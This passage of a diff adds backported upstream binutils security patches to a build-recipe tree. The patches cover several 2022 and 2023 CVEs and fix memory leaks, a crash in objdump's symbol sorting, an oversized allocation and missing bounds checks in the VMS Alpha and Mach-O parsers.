+ if (pargs == NULL)
+- return NULL;
++ {
++ free (dt);
++ return NULL;
++ }
+
+ return debug_make_function_type (dhandle, dt, pargs, varargs);
+ }
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch
new file mode 100644
index 0000000000..9527390ccf
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch
@@ -0,0 +1,64 @@
+From d6e1d48c83b165c129cb0aa78905f7ca80a1f682 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 17 Jun 2022 09:13:38 +0930
+Subject: [PATCH] PR29255, memory leak in make_tempdir
+
+ PR 29255
+ * bucomm.c (make_tempdir, make_tempname): Free template on all
+ failure paths.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=d6e1d48c83b165c129cb0aa78905f7ca80a1f682]
+CVE: CVE-2022-47008
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/bucomm.c | 20 +++++++++++---------
+ 1 file changed, 11 insertions(+), 9 deletions(-)
+
+diff --git a/binutils/bucomm.c b/binutils/bucomm.c
+index fdc2209df9c..4395cb9f7f5 100644
+--- a/binutils/bucomm.c
++++ b/binutils/bucomm.c
+@@ -542,8 +542,9 @@
+ #else
+ tmpname = mktemp (tmpname);
+ if (tmpname == NULL)
+- return NULL;
+- fd = open (tmpname, O_RDWR | O_CREAT | O_EXCL, 0600);
++ fd = -1;
++ else
++ fd = open (tmpname, O_RDWR | O_CREAT | O_EXCL, 0600);
+ #endif
+ if (fd == -1)
+ {
+@@ -561,22 +562,23 @@
+ make_tempdir (const char *filename)
+ {
+ char *tmpname = template_in_dir (filename);
++ char *ret;
+
+ #ifdef HAVE_MKDTEMP
+- return mkdtemp (tmpname);
++ ret = mkdtemp (tmpname);
+ #else
+- tmpname = mktemp (tmpname);
+- if (tmpname == NULL)
+- return NULL;
++ ret = mktemp (tmpname);
+ #if defined (_WIN32) && !defined (__CYGWIN32__)
+ if (mkdir (tmpname) != 0)
+- return NULL;
++ ret = NULL;
+ #else
+ if (mkdir (tmpname, 0700) != 0)
+- return NULL;
++ ret = NULL;
+ #endif
+- return tmpname;
+ #endif
++ if (ret == NULL)
++ free (tmpname);
++ return ret;
+ }
+
+ /* Parse a string into a VMA, with a fatal error if it can't be
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch
new file mode 100644
index 0000000000..d831ed4756
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch
@@ -0,0 +1,34 @@
+From 0d02e70b197c786f26175b9a73f94e01d14abdab Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Mon, 20 Jun 2022 10:39:31 +0930
+Subject: [PATCH] PR29262, memory leak in pr_function_type
+
+ PR 29262
+ * prdbg.c (pr_function_type): Free "s" on failure path.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=0d02e70b197c786f26175b9a73f94e01d14abdab]
+CVE: CVE-2022-47010
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/prdbg.c | 7 ++-----
+ 1 file changed, 2 insertions(+), 5 deletions(-)
+
+diff --git a/binutils/prdbg.c b/binutils/prdbg.c
+index c1e41628d26..bb42a5b6c2d 100644
+--- a/binutils/prdbg.c
++++ b/binutils/prdbg.c
+@@ -778,12 +778,9 @@
+
+ strcat (s, ")");
+
+- if (! substitute_type (info, s))
+- return FALSE;
+-
++ bfd_boolean ret = substitute_type (info, s);
+ free (s);
+-
+- return TRUE;
++ return ret;
+ }
+
+ /* Turn the top type on the stack into a reference to that type. */
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch
new file mode 100644
index 0000000000..250756bd38
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch
@@ -0,0 +1,31 @@
+From 8a24927bc8dbf6beac2000593b21235c3796dc35 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Mon, 20 Jun 2022 10:39:13 +0930
+Subject: [PATCH] PR29261, memory leak in parse_stab_struct_fields
+
+ PR 29261
+ * stabs.c (parse_stab_struct_fields): Free "fields" on failure path.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=8a24927bc8dbf6beac2000593b21235c3796dc35]
+CVE: CVE-2022-47011
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/stabs.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/binutils/stabs.c b/binutils/stabs.c
+index 796ff85b86a..bf3f578cbcc 100644
+--- a/binutils/stabs.c
++++ b/binutils/stabs.c
+@@ -2368,7 +2368,10 @@
+
+ if (! parse_stab_one_struct_field (dhandle, info, pp, p, fields + c,
+ staticsp, p_end))
+- return FALSE;
++ {
++ free (fields);
++ return FALSE;
++ }
+
+ ++c;
+ }
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch
new file mode 100644
index 0000000000..101a4cdb4e
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch
@@ -0,0 +1,57 @@
+From 3d3af4ba39e892b1c544d667ca241846bc3df386 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Sun, 4 Dec 2022 22:15:40 +1030
+Subject: [PATCH] PR29846, segmentation fault in objdump.c compare_symbols
+
+Fixes a fuzzed object file problem where plt relocs were manipulated
+in such a way that two synthetic symbols were generated at the same
+plt location. Won't occur in real object files.
+
+ PR 29846
+ PR 20337
+ * objdump.c (compare_symbols): Test symbol flags to exclude
+ section and synthetic symbols before attempting to check flavour.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff;h=3d3af4ba39e892b1c544d667ca241846bc3df386]
+CVE: CVE-2022-47695
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/objdump.c | 23 ++++++++++-------------
+ 1 file changed, 10 insertions(+), 13 deletions(-)
+
+diff --git a/binutils/objdump.c b/binutils/objdump.c
+index e8481b2d928..d95c8b68bf0 100644
+--- a/binutils/objdump.c
++++ b/binutils/objdump.c
+@@ -935,20 +935,17 @@
+ return 1;
+ }
+
+- if (bfd_get_flavour (bfd_asymbol_bfd (a)) == bfd_target_elf_flavour
++ /* Sort larger size ELF symbols before smaller. See PR20337. */
++ bfd_vma asz = 0;
++ if ((a->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0
++ && bfd_get_flavour (bfd_asymbol_bfd (a)) == bfd_target_elf_flavour)
++ asz = ((elf_symbol_type *) a)->internal_elf_sym.st_size;
++ bfd_vma bsz = 0;
++ if ((b->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0
+ && bfd_get_flavour (bfd_asymbol_bfd (b)) == bfd_target_elf_flavour)
+- {
+- bfd_vma asz, bsz;
+-
+- asz = 0;
+- if ((a->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0)
+- asz = ((elf_symbol_type *) a)->internal_elf_sym.st_size;
+- bsz = 0;
+- if ((b->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0)
+- bsz = ((elf_symbol_type *) b)->internal_elf_sym.st_size;
+- if (asz != bsz)
+- return asz > bsz ? -1 : 1;
+- }
++ bsz = ((elf_symbol_type *) b)->internal_elf_sym.st_size;
++ if (asz != bsz)
++ return asz > bsz ? -1 : 1;
+
+ /* Symbols that start with '.' might be section names, so sort them
+ after symbols that don't start with '.'. */
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch
new file mode 100644
index 0000000000..f41c02a02b
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch
@@ -0,0 +1,49 @@
+From 75393a2d54bcc40053e5262a3de9d70c5ebfbbfd Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Wed, 21 Dec 2022 11:51:23 +0000
+Subject: [PATCH] Fix an attempt to allocate an unreasonably large amount of
+ memory when parsing a corrupt ELF file.
+
+ PR 29924
+ * objdump.c (load_specific_debug_section): Check for excessively
+ large sections.
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=75393a2d54bcc40053e5262a3de9d70c5ebfbbfd]
+CVE: CVE-2022-48063
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/ChangeLog | 6 ++++++
+ binutils/objdump.c | 4 +++-
+ 2 files changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/binutils/ChangeLog b/binutils/ChangeLog
+index e7f918d3f65..020e09f3700 100644
+--- a/binutils/ChangeLog
++++ b/binutils/ChangeLog
+@@ -1,3 +1,9 @@
++2022-12-21 Nick Clifton <nickc@redhat.com>
++
++ PR 29924
++ * objdump.c (load_specific_debug_section): Check for excessively
++ large sections.
++
+ 2021-02-11 Alan Modra <amodra@gmail.com>
+
+ PR 27290
+
+diff --git a/binutils/objdump.c b/binutils/objdump.c
+index d51abbe3858..2eb02de0e76 100644
+--- a/binutils/objdump.c
++++ b/binutils/objdump.c
+@@ -3479,7 +3479,9 @@
+ section->size = bfd_section_size (sec);
+ /* PR 24360: On 32-bit hosts sizeof (size_t) < sizeof (bfd_size_type). */
+ alloced = amt = section->size + 1;
+- if (alloced != amt || alloced == 0)
++ if (alloced != amt
++ || alloced == 0
++ || (bfd_get_size (abfd) != 0 && alloced >= bfd_get_size (abfd)))
+ {
+ section->start = NULL;
+ free_debug_section (debug);
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch b/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch
new file mode 100644
index 0000000000..732ea43210
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch
@@ -0,0 +1,530 @@
+CVE: CVE-2023-25584
+Upstream-Status: Backport [ import from ubuntu http://archive.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.34-6ubuntu1.7.debian.tar.xz upstream https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=77c225bdeb410cf60da804879ad41622f5f1aa44 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+[Ubuntu note: this is backport of the original patch, no major changes just
+ fix this patch for this release]
+From 77c225bdeb410cf60da804879ad41622f5f1aa44 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Mon, 12 Dec 2022 18:28:49 +1030
+Subject: [PATCH] Lack of bounds checking in vms-alpha.c parse_module
+
+ PR 29873
+ PR 29874
+ PR 29875
+ PR 29876
+ PR 29877
+ PR 29878
+ PR 29879
+ PR 29880
+ PR 29881
+ PR 29882
+ PR 29883
+ PR 29884
+ PR 29885
+ PR 29886
+ PR 29887
+ PR 29888
+ PR 29889
+ PR 29890
+ PR 29891
+ * vms-alpha.c (parse_module): Make length param bfd_size_type.
+ Delete length == -1 checks. Sanity check record_length.
+ Sanity check DST__K_MODBEG, DST__K_RTNBEG, DST__K_RTNEND lengths.
+ Sanity check DST__K_SOURCE and DST__K_LINE_NUM elements
+ before accessing.
+ (build_module_list): Pass dst_section size to parse_module.
+---
+ bfd/vms-alpha.c | 213 ++++++++++++++++++++++++++++++++++++++----------
+ 1 file changed, 168 insertions(+), 45 deletions(-)
+
+--- binutils-2.34.orig/bfd/vms-alpha.c
++++ binutils-2.34/bfd/vms-alpha.c
+@@ -4267,7 +4267,7 @@ new_module (bfd *abfd)
+
+ static void
+ parse_module (bfd *abfd, struct module *module, unsigned char *ptr,
+- int length)
++ bfd_size_type length)
+ {
+ unsigned char *maxptr = ptr + length;
+ unsigned char *src_ptr, *pcl_ptr;
+@@ -4284,7 +4284,7 @@ parse_module (bfd *abfd, struct module *
+ curr_line = (struct lineinfo *) bfd_zalloc (abfd, sizeof (struct lineinfo));
+ module->line_table = curr_line;
+
+- while (length == -1 || ptr < maxptr)
++ while (ptr < maxptr)
+ {
+ /* The first byte is not counted in the recorded length. */
+ int rec_length = bfd_getl16 (ptr) + 1;
+@@ -4292,15 +4292,19 @@ parse_module (bfd *abfd, struct module *
+
+ vms_debug2 ((2, "DST record: leng %d, type %d\n", rec_length, rec_type));
+
+- if (length == -1 && rec_type == DST__K_MODEND)
++ if (rec_length > maxptr - ptr)
++ break;
++ if (rec_type == DST__K_MODEND)
+ break;
+
+ switch (rec_type)
+ {
+ case DST__K_MODBEG:
++ if (rec_length <= DST_S_B_MODBEG_NAME)
++ break;
+ module->name
+ = _bfd_vms_save_counted_string (abfd, ptr + DST_S_B_MODBEG_NAME,
+- maxptr - (ptr + DST_S_B_MODBEG_NAME));
++ rec_length - DST_S_B_MODBEG_NAME);
+
+ curr_pc = 0;
+ prev_pc = 0;
+@@ -4314,11 +4318,13 @@ parse_module (bfd *abfd, struct module *
+ break;
+
+ case DST__K_RTNBEG:
++ if (rec_length <= DST_S_B_RTNBEG_NAME)
++ break;
+ funcinfo = (struct funcinfo *)
+ bfd_zalloc (abfd, sizeof (struct funcinfo));
+ funcinfo->name
+ = _bfd_vms_save_counted_string (abfd, ptr + DST_S_B_RTNBEG_NAME,
+- maxptr - (ptr + DST_S_B_RTNBEG_NAME));
++ rec_length - DST_S_B_RTNBEG_NAME);
+ funcinfo->low = bfd_getl32 (ptr + DST_S_L_RTNBEG_ADDRESS);
+ funcinfo->next = module->func_table;
+ module->func_table = funcinfo;
+@@ -4328,6 +4334,8 @@ parse_module (bfd *abfd, struct module *
+ break;
+
+ case DST__K_RTNEND:
++ if (rec_length < DST_S_L_RTNEND_SIZE + 4)
++ break;
+ module->func_table->high = module->func_table->low
+ + bfd_getl32 (ptr + DST_S_L_RTNEND_SIZE) - 1;
+
+@@ -4358,13 +4366,66 @@ parse_module (bfd *abfd, struct module *
+
+ vms_debug2 ((3, "source info\n"));
+
+- while (src_ptr < ptr + rec_length)
++ while (src_ptr - ptr < rec_length)
+ {
+ int cmd = src_ptr[0], cmd_length, data;
+
+ switch (cmd)
+ {
+ case DST__K_SRC_DECLFILE:
++ if (src_ptr - ptr + DST_S_B_SRC_DF_LENGTH >= rec_length)
++ cmd_length = 0x10000;
++ else
++ cmd_length = src_ptr[DST_S_B_SRC_DF_LENGTH] + 2;
++ break;
++
++ case DST__K_SRC_DEFLINES_B:
++ cmd_length = 2;
++ break;
++
++ case DST__K_SRC_DEFLINES_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SRC_INCRLNUM_B:
++ cmd_length = 2;
++ break;
++
++ case DST__K_SRC_SETFILE:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SRC_SETLNUM_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SRC_SETLNUM_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SRC_SETREC_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SRC_SETREC_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SRC_FORMFEED:
++ cmd_length = 1;
++ break;
++
++ default:
++ cmd_length = 2;
++ break;
++ }
++
++ if (src_ptr - ptr + cmd_length > rec_length)
++ break;
++
++ switch (cmd)
++ {
++ case DST__K_SRC_DECLFILE:
+ {
+ unsigned int fileid
+ = bfd_getl16 (src_ptr + DST_S_W_SRC_DF_FILEID);
+@@ -4384,7 +4445,6 @@ parse_module (bfd *abfd, struct module *
+
+ module->file_table [fileid].name = filename;
+ module->file_table [fileid].srec = 1;
+- cmd_length = src_ptr[DST_S_B_SRC_DF_LENGTH] + 2;
+ vms_debug2 ((4, "DST_S_C_SRC_DECLFILE: %d, %s\n",
+ fileid, module->file_table [fileid].name));
+ }
+@@ -4401,7 +4461,6 @@ parse_module (bfd *abfd, struct module *
+ srec->sfile = curr_srec->sfile;
+ curr_srec->next = srec;
+ curr_srec = srec;
+- cmd_length = 2;
+ vms_debug2 ((4, "DST_S_C_SRC_DEFLINES_B: %d\n", data));
+ break;
+
+@@ -4416,14 +4475,12 @@ parse_module (bfd *abfd, struct module *
+ srec->sfile = curr_srec->sfile;
+ curr_srec->next = srec;
+ curr_srec = srec;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST_S_C_SRC_DEFLINES_W: %d\n", data));
+ break;
+
+ case DST__K_SRC_INCRLNUM_B:
+ data = src_ptr[DST_S_B_SRC_UNSBYTE];
+ curr_srec->line += data;
+- cmd_length = 2;
+ vms_debug2 ((4, "DST_S_C_SRC_INCRLNUM_B: %d\n", data));
+ break;
+
+@@ -4431,21 +4488,18 @@ parse_module (bfd *abfd, struct module *
+ data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
+ curr_srec->sfile = data;
+ curr_srec->srec = module->file_table[data].srec;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST_S_C_SRC_SETFILE: %d\n", data));
+ break;
+
+ case DST__K_SRC_SETLNUM_L:
+ data = bfd_getl32 (src_ptr + DST_S_L_SRC_UNSLONG);
+ curr_srec->line = data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST_S_C_SRC_SETLNUM_L: %d\n", data));
+ break;
+
+ case DST__K_SRC_SETLNUM_W:
+ data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
+ curr_srec->line = data;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST_S_C_SRC_SETLNUM_W: %d\n", data));
+ break;
+
+@@ -4453,7 +4507,6 @@ parse_module (bfd *abfd, struct module *
+ data = bfd_getl32 (src_ptr + DST_S_L_SRC_UNSLONG);
+ curr_srec->srec = data;
+ module->file_table[curr_srec->sfile].srec = data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST_S_C_SRC_SETREC_L: %d\n", data));
+ break;
+
+@@ -4461,19 +4514,16 @@ parse_module (bfd *abfd, struct module *
+ data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
+ curr_srec->srec = data;
+ module->file_table[curr_srec->sfile].srec = data;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST_S_C_SRC_SETREC_W: %d\n", data));
+ break;
+
+ case DST__K_SRC_FORMFEED:
+- cmd_length = 1;
+ vms_debug2 ((4, "DST_S_C_SRC_FORMFEED\n"));
+ break;
+
+ default:
+ _bfd_error_handler (_("unknown source command %d"),
+ cmd);
+- cmd_length = 2;
+ break;
+ }
+
+@@ -4486,7 +4536,7 @@ parse_module (bfd *abfd, struct module *
+
+ vms_debug2 ((3, "line info\n"));
+
+- while (pcl_ptr < ptr + rec_length)
++ while (pcl_ptr - ptr < rec_length)
+ {
+ /* The command byte is signed so we must sign-extend it. */
+ int cmd = ((signed char *)pcl_ptr)[0], cmd_length, data;
+@@ -4494,10 +4544,106 @@ parse_module (bfd *abfd, struct module *
+ switch (cmd)
+ {
+ case DST__K_DELTA_PC_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_DELTA_PC_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_INCR_LINUM:
++ cmd_length = 2;
++ break;
++
++ case DST__K_INCR_LINUM_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_INCR_LINUM_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SET_LINUM_INCR:
++ cmd_length = 2;
++ break;
++
++ case DST__K_SET_LINUM_INCR_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_RESET_LINUM_INCR:
++ cmd_length = 1;
++ break;
++
++ case DST__K_BEG_STMT_MODE:
++ cmd_length = 1;
++ break;
++
++ case DST__K_END_STMT_MODE:
++ cmd_length = 1;
++ break;
++
++ case DST__K_SET_LINUM_B:
++ cmd_length = 2;
++ break;
++
++ case DST__K_SET_LINUM:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SET_LINUM_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SET_PC:
++ cmd_length = 2;
++ break;
++
++ case DST__K_SET_PC_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SET_PC_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SET_STMTNUM:
++ cmd_length = 2;
++ break;
++
++ case DST__K_TERM:
++ cmd_length = 2;
++ break;
++
++ case DST__K_TERM_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_TERM_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SET_ABS_PC:
++ cmd_length = 5;
++ break;
++
++ default:
++ if (cmd <= 0)
++ cmd_length = 1;
++ else
++ cmd_length = 2;
++ break;
++ }
++
++ if (pcl_ptr - ptr + cmd_length > rec_length)
++ break;
++
++ switch (cmd)
++ {
++ case DST__K_DELTA_PC_W:
+ data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ curr_pc += data;
+ curr_linenum += 1;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST__K_DELTA_PC_W: %d\n", data));
+ break;
+
+@@ -4505,131 +4651,111 @@ parse_module (bfd *abfd, struct module *
+ data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ curr_pc += data;
+ curr_linenum += 1;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST__K_DELTA_PC_L: %d\n", data));
+ break;
+
+ case DST__K_INCR_LINUM:
+ data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
+ curr_linenum += data;
+- cmd_length = 2;
+ vms_debug2 ((4, "DST__K_INCR_LINUM: %d\n", data));
+ break;
+
+ case DST__K_INCR_LINUM_W:
+ data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ curr_linenum += data;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST__K_INCR_LINUM_W: %d\n", data));
+ break;
+
+ case DST__K_INCR_LINUM_L:
+ data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ curr_linenum += data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST__K_INCR_LINUM_L: %d\n", data));
+ break;
+
+ case DST__K_SET_LINUM_INCR:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_LINUM_INCR");
+- cmd_length = 2;
+ break;
+
+ case DST__K_SET_LINUM_INCR_W:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_LINUM_INCR_W");
+- cmd_length = 3;
+ break;
+
+ case DST__K_RESET_LINUM_INCR:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_RESET_LINUM_INCR");
+- cmd_length = 1;
+ break;
+
+ case DST__K_BEG_STMT_MODE:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_BEG_STMT_MODE");
+- cmd_length = 1;
+ break;
+
+ case DST__K_END_STMT_MODE:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_END_STMT_MODE");
+- cmd_length = 1;
+ break;
+
+ case DST__K_SET_LINUM_B:
+ data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
+ curr_linenum = data;
+- cmd_length = 2;
+ vms_debug2 ((4, "DST__K_SET_LINUM_B: %d\n", data));
+ break;
+
+ case DST__K_SET_LINUM:
+ data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ curr_linenum = data;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST__K_SET_LINE_NUM: %d\n", data));
+ break;
+
+ case DST__K_SET_LINUM_L:
+ data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ curr_linenum = data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST__K_SET_LINUM_L: %d\n", data));
+ break;
+
+ case DST__K_SET_PC:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_PC");
+- cmd_length = 2;
+ break;
+
+ case DST__K_SET_PC_W:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_PC_W");
+- cmd_length = 3;
+ break;
+
+ case DST__K_SET_PC_L:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_PC_L");
+- cmd_length = 5;
+ break;
+
+ case DST__K_SET_STMTNUM:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_STMTNUM");
+- cmd_length = 2;
+ break;
+
+ case DST__K_TERM:
+ data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
+ curr_pc += data;
+- cmd_length = 2;
+ vms_debug2 ((4, "DST__K_TERM: %d\n", data));
+ break;
+
+ case DST__K_TERM_W:
+ data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ curr_pc += data;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST__K_TERM_W: %d\n", data));
+ break;
+
+ case DST__K_TERM_L:
+ data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ curr_pc += data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST__K_TERM_L: %d\n", data));
+ break;
+
+ case DST__K_SET_ABS_PC:
+ data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ curr_pc = data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST__K_SET_ABS_PC: 0x%x\n", data));
+ break;
+
+@@ -4638,15 +4764,11 @@ parse_module (bfd *abfd, struct module *
+ {
+ curr_pc -= cmd;
+ curr_linenum += 1;
+- cmd_length = 1;
+ vms_debug2 ((4, "bump pc to 0x%lx and line to %d\n",
+ (unsigned long)curr_pc, curr_linenum));
+ }
+ else
+- {
+- _bfd_error_handler (_("unknown line command %d"), cmd);
+- cmd_length = 2;
+- }
++ _bfd_error_handler (_("unknown line command %d"), cmd);
+ break;
+ }
+
+@@ -4778,7 +4900,7 @@ build_module_list (bfd *abfd)
+ return NULL;
+
+ module = new_module (abfd);
+- parse_module (abfd, module, PRIV (dst_section)->contents, -1);
++ parse_module (abfd, module, PRIV (dst_section)->contents, PRIV (dst_section)->size);
+ list = module;
+ }
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch b/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch
new file mode 100644
index 0000000000..aa5ce5f3ff
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch
@@ -0,0 +1,149 @@
+From d12f8998d2d086f0a6606589e5aedb7147e6f2f1 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 14 Oct 2022 10:30:21 +1030
+Subject: [PATCH] PR29677, Field `the_bfd` of `asymbol` is uninitialised
+
+Besides not initialising the_bfd of synthetic symbols, counting
+symbols when sizing didn't match symbols created if there were any
+dynsyms named "". We don't want synthetic symbols without names
+anyway, so get rid of them. Also, simplify and correct sanity checks.
+
+ PR 29677
+ * mach-o.c (bfd_mach_o_get_synthetic_symtab): Rewrite.
+---
+Upstream-Status: Backport from [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=d12f8998d2d086f0a6606589e5aedb7147e6f2f1]
+CVE: CVE-2023-25588
+CVE: CVE-2022-47696
+
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+Signed-off-by: poojitha adireddy <pooadire@cisco.com>
+
+ bfd/mach-o.c | 72 ++++++++++++++++++++++------------------------------
+ 1 file changed, 31 insertions(+), 41 deletions(-)
+
+diff --git a/bfd/mach-o.c b/bfd/mach-o.c
+index acb35e7f0c6..5279343768c 100644
+--- a/bfd/mach-o.c
++++ b/bfd/mach-o.c
+@@ -938,11 +938,9 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
+ bfd_mach_o_symtab_command *symtab = mdata->symtab;
+ asymbol *s;
+ char * s_start;
+- char * s_end;
+ unsigned long count, i, j, n;
+ size_t size;
+ char *names;
+- char *nul_name;
+ const char stub [] = "$stub";
+
+ *ret = NULL;
+@@ -955,27 +953,27 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
+ /* We need to allocate a bfd symbol for every indirect symbol and to
+ allocate the memory for its name. */
+ count = dysymtab->nindirectsyms;
+- size = count * sizeof (asymbol) + 1;
+-
++ size = 0;
+ for (j = 0; j < count; j++)
+ {
+- const char * strng;
+ unsigned int isym = dysymtab->indirect_syms[j];
++ const char *str;
+
+ /* Some indirect symbols are anonymous. */
+- if (isym < symtab->nsyms && (strng = symtab->symbols[isym].symbol.name))
+- /* PR 17512: file: f5b8eeba. */
+- size += strnlen (strng, symtab->strsize - (strng - symtab->strtab)) + sizeof (stub);
++ if (isym < symtab->nsyms
++ && (str = symtab->symbols[isym].symbol.name) != NULL)
++ {
++ /* PR 17512: file: f5b8eeba. */
++ size += strnlen (str, symtab->strsize - (str - symtab->strtab));
++ size += sizeof (stub);
++ }
+ }
+
+- s_start = bfd_malloc (size);
++ s_start = bfd_malloc (size + count * sizeof (asymbol));
+ s = *ret = (asymbol *) s_start;
+ if (s == NULL)
+ return -1;
+ names = (char *) (s + count);
+- nul_name = names;
+- *names++ = 0;
+- s_end = s_start + size;
+
+ n = 0;
+ for (i = 0; i < mdata->nsects; i++)
+@@ -997,47 +995,39 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
+ entry_size = bfd_mach_o_section_get_entry_size (abfd, sec);
+
+ /* PR 17512: file: 08e15eec. */
+- if (first >= count || last >= count || first > last)
++ if (first >= count || last > count || first > last)
+ goto fail;
+
